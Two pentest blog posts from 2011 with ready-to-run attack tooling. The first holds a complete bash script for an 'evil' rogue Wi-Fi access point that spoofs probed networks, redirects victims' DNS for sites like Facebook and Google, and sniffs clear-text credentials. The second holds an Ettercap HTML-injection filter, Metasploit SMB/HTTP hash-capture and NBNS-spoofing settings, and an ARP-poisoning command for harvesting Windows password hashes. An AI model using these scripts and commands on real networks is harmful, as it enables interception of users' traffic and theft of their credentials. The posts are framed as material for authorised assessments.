Friday, 4 November 2011

A quick 'n' evil Access Point

I have been carrying out wireless assessments for some clients recently, and to be honest, if the client is security savvy enough to be requesting a wireless pentest, then usually (i said usually ;) they are savvy enough to have secured their network in a reasonable manner. Finding one setup with WEP is certainly not going to happen. If you are up against WPA/WPA2 then you should check out Elcomsoft's Wireless auditor, purely for its GPU support and password permutations.
Another good resource is http://tools.question-defense.com/wpa-password-cracker
They charge $10 to crack your WPA key, and have a huge dictionary of 1.5 billion words.

Anyway, suppose you have explored the aforementioned methods and have had little luck. Time for another way.....

The next best thing to cracking a wireless network key, is to be able to force the clients on that network to connect to your network. Various tools and techniques exist for this including karma, jasager, and the social engineering toolkit. I have had a varying amounts of success with these tools, and blindly running a tool without fully understanding exactly what is happening under the hood is often a bad idea, so i decided the best thing for me to do, is to go away and work my way through the excellent Wireless security megaprimer available here: http://www.securitytube.net/groups?operation=viewall&groupId=0
This course takes you through each step manually, so gives you a decent understanding of what processes make up this technique of coercing someone to connect to your wireless network.

Working through this course, I have realised, there are a great many commands to run through in order to get your fake access point up and running properley, so i have whipped up a bash script to automate all this. Feel free to make use of this, although make sure you have a basic knowledge of the process first, or better still, check out the securitytube training videos first.

Okay, this script was designed for those using backtrack within a VM with both a bridged connection through the host to provide internet access,  and a wireless alfa card connected to host the fake access point.
I have also included in the script, the commands to resolve the SIOCSIFFLAGS error, common with the ALFA cards running under vmware.
I don't see why it wouldnt work in any other setup, basically you just need to copy it to your bactrack machine and chmod 755 to make it executable, and off you go.
It will setup a fake access point and also spoof any other access points that nearby computers are probing for. Once this is done it will finish by setting up Dsniff and DNSspoof and URLsnarf to redirect any connected clients to your own machine. I use this alongside the SET website attacks, and it works very well.

#!/bin/bash
txtgreen=$(tput setaf 2) # Green
txtrst=$(tput sgr0) # Text reset
clear
echo
echo "          ***************************************************"
echo "          *                                                 *"
echo "          *                  Welcome to                     *"
echo "          *    ${txtgreen}  The Quick 'n' Evil Access Point${txtrst}       *"
echo "          *         By Sean gambles Nov 2011  v0.12          *"
echo "          *                                                 *"
echo "          ***************************************************"
echo
echo "This tool makes use of the aircrack suite. "
echo "This script will setup a fake access point of your choosing, spoof any"
echo "Access Points that nearby computers are probing for, and then setup DNS "
echo "spoofing and Dsniff to redirect connected clients to your IP address, and"
echo "sniff for clear-text credentials. "
echo "Once the Access Point is up and running, you can utilise other tools"
echo "such as the social engineering toolkit to run alongside this, and either"
echo "capture credentials, or deliver malicous payloads through iframe and java"
echo "applet methods. Ideally, for this script to work, you will need to have "
echo "an alfa wifi card plugged in and a mapped network connection through VMWare,"
echo "preferbly bridged,not NAT'd, as these seem to crash out regularly."
echo
sleep 3
echo
echo "${txtgreen}[*]Please enter the number given to your eth device e.g eth2."
read -p "this can be found by running ifconfig -a :${txtrst}" wired
echo
echo
read -p "${txtgreen}[*]Please enter the number given to your wireless device e.g wlan1 :${txtrst}" wifi
echo
echo
read -p "${txtgreen}[*]Please enter the channel you would like your access point to run on :${txtrst}" channel
echo
echo
read -p "${txtgreen}[*]Please enter the SSID you would like your access point to use :${txtrst}" ssid
echo
echo
echo "${txtgreen}[*]Repairing the issue with the Alfa driver...${txtrst}"
echo
echo "Please be patient, you may ignore any errors here"
rmmod rtl8187
rfkill block all
rfkill unblock all
modprobe rtl8187
rfkill unblock all

echo "${txtgreen}[*]increasing alfa power to 30dB${txtrst}"
iw reg set BO
echo Bringing $wifi Up
ifconfig $wifi up
ifconfig $wifi down
ifconfig $wifi up
clear
echo
echo
echo "${txtgreen}[*]Setting up the fake access point ${txtrst}"
sleep 2
clear
echo
echo
echo "${txtgreen}[*]cleaning up previous network settings${txtrst}"
ifconfig mitm down
brctl delbr mitm
ifconfig $wired 0.0.0.0 down
ifconfig at0 down
airmon-ng stop mon0
clear
echo
echo
echo "${txtgreen}[*]putting wifi into monitor mode${txtrst}"
airmon-ng start $wifi
sleep 2
clear
echo
echo
echo "${txtgreen}[*]setting the channel on the interfaces${txtrst}"
iwconfig $wifi channel $channel
iwconfig mon0 channel $channel
clear
echo
echo
echo "${txtgreen}[*]Setting up the fake access point on channel $channel ${txtrst}"
xterm -geometry 120x7-0+0 -bg black -fg green -T "airbase-ng" -e /usr/local/sbin/airbase-ng --essid $ssid -P -C 10 -c $channel mon0 &
sleep 2
clear
echo
echo
echo "${txtgreen}[*]Fake Access Point is now running.... ${txtrst}"
sleep 2
clear
echo
echo
echo "${txtgreen}[*]bringing up the at0 interface${txtrst}"
ifconfig at0 up
sleep 5
clear
echo
echo
echo "${txtgreen}[*]Adding the man in the middle bridge${txtrst}"
brctl addbr mitm
sleep 2
clear
echo
echo
echo "${txtgreen}[*]Joining the at0 and eth interfaces to your bridge${txtrst}"
brctl addif mitm $wired
brctl addif mitm at0
sleep 2
clear
echo
echo
echo "${txtgreen}[*]Clearing the ip addresses"
ifconfig $wired 0.0.0.0 up
sleep 2
ifconfig at0 0.0.0.0 up
sleep 2
clear
echo
echo
echo "${txtgreen}[*]Bringing up the new bridge and collecting an ip address${txtrst}"
ifconfig mitm up
dhclient mitm
sleep 5
mitm=$(ifconfig mitm | sed -n '2 p' | awk '{print $2}' |cut -d":" -f2)
clear
echo
echo
echo "${txtgreen}[*]Please enter up to three websites you wish to spoof"
read -p "DNS for e.g *.facebook.com
www.google.com *.com :${txtrst}" web1 web2 web3
sleep 2
clear
echo
echo
echo "${txtgreen}[*]Starting up Dnsspoof Dsniff and URLsnarf...."
echo $mitm $web1>/tmp/hosts.txt
echo $mitm $web2>>/tmp/hosts.txt
echo $mitm $web3>>/tmp/hosts.txt
sleep 2
clear
echo
echo
echo "${txtgreen}[*]Okay.... all ready to go, have fun! :0) ${txtrst}"
xterm -geometry 120x7-0+200 -bg black -fg green -T "DNSspoof" -e /usr/local/sbin/dnsspoof -f /tmp/hosts.txt -i mitm &
xterm -geometry 120x7-0+350 -bg black -fg green -T "Dsniff" -e /usr/local/sbin/dsniff -i mitm &
xterm -geometry 120x7-0+500 -bg black -fg green -T "URLsnarf" -e /usr/local/sbin/urlsnarf -i mitm &
sleep 12

Tuesday, 1 November 2011

Using Ettercap to improve NetBIOS attacks

For those of you that have tried out NetBIOS spoofing, (explained Here), you know how devastatingly effective this is on an internal network. There are however, times when good crackable hashes just don't seem to be passing your way. Maybe the network is quiet, or you are just getting NTLMv2 hashes that you just can't seem to crack. If only you could somehow force those XP clients to send over their user's LM hashes...
Well... it seems you can with Ettercap, and it works very well too.
One of the great things about Ettercap, is that you can do so much more with man-in-the-middle attacks versus Cain for instance. DNS spoofing, ARP spoofing, iframe injections and many more are possible with this tool. Today though we are going to use a custom filter in an attempt to force the clients, via some HTML injection,  to connect to a fake share on our machine so that we can then harvest their authentication hashes.

Remember, for this attack to work, you will need to be targetting wired clients on the network (unless they are using open or WEP wifi) as we will be actively changing their traffic, and this would not be possible on a WPA network due to the individual client encryption keys being used.

First of all you will need to setup metasploit...
Let's see if we can find some low hanging fruit (XP machines)

use auxiliary/scanner/smb/smb_version




Excellent some target XP machines. Make a note of these IP addresses as we will need to target these with Ettercap next.

Now we need to get out filter configured for Ettercap. As you can see from looking at the filter below, we will be adding in an HTML tag into the web pages that the target will be viewing. This tag will tell the browser that it needs to load an image to display on the page and to load it from a share on your IP.
The image wont be there, but Metasploit will capture these requests, spoof the challenge, and capture the user's hash.

Modify the following filter to your own IP address, and save this as netbios.filter.



 if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Rubbish!")) {
      replace("Accept-Rubbish!", "Accept-gnidocnE");
      msg("Encoding Taken Care Of...\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("head>", "head> <img src=\"
\\\\192.168.20.10\\pixel.gif\"> ");
msg("Replacement Filter Ran.\n");
}



Next, we need to install Ettercap: apt-get install ettercap
then within the /usr/local/share/ettercap folder, run etterfilter /root/netbios.filter -o netbios.ef.
This will complile the filter into a format Ettercap can understand.

We now need to return to Metasploit and setup the netbios spoofing modules to be ready to capture the incoming hashes, you can use the following resource script to save time:


use auxiliary/server/capture/smb
set srvhost 192.168.20.10
set cainpwfile /tmp/cain
set johnpwfile /tmp/john
run
use auxiliary/server/capture/http_ntlm
set srvhost 192.168.20.10
set cainpwfile /tmp/cain
set johnpwfile /tmp/john
set uripath /share
set srvport 80
run
use auxiliary/spoof/nbns/nbns_response
set spoofip 192.168.20.10
run


Once you have this running, we can now start ettercap:

ettercap -TqF netbios.ef -M arp:remote /192.168.20.26,29,30/ /<gatewayIP>/ -i eth0

This will fire up Ettercap in text mode (T) without verbose info (q) and with the netbios filter (F) using the arp spoofing method (M) against the 3 XP clients.

Once the users on these clients start browsing web pages, you should see a flurry of hashes coming your way :0)

Remember to press "q" once you have these hashes so that Ettercap will re-poison them to prevent any network drop-out.



Make sure you have permission first, and have fun folks!